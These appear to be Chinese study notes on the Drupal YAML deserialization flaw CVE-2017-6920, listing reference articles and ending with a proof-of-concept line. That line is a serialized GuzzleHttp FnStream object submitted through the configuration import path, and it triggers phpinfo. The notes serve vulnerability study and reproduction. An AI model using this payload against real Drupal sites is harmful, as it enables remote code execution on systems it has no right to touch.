PHP反序列化漏洞的原理及复现 - FreeBuf网络安全行业门户
CVE-2017-6920:Drupal远程代码执行漏洞分析及POC构造 (seebug.org)
代码审计之CVE-2017-6920 Drupal远程代码执行漏洞学习 - tr1ple - 博客园 (cnblogs.com)
Drupal YAML 反序列化代码执行漏洞(CVE-2017-6920)复现及分析 - FreeBuf网络安全行业门户
(CVE 2017 6920)Drupal Core 8 PECL YAML 反序列化任意代码执行漏洞 - VulDoc
POC /admin/config/development/configuration/single/import!php/object "O:24:\"GuzzleHttp\\Psr7\\FnStream\":2:{s:7:\"methods\";a:1:{s:5:\"close\";s:7:\"phpinfo\";}s:9:\"_fn_close\";s:7:\"phpinfo\";}"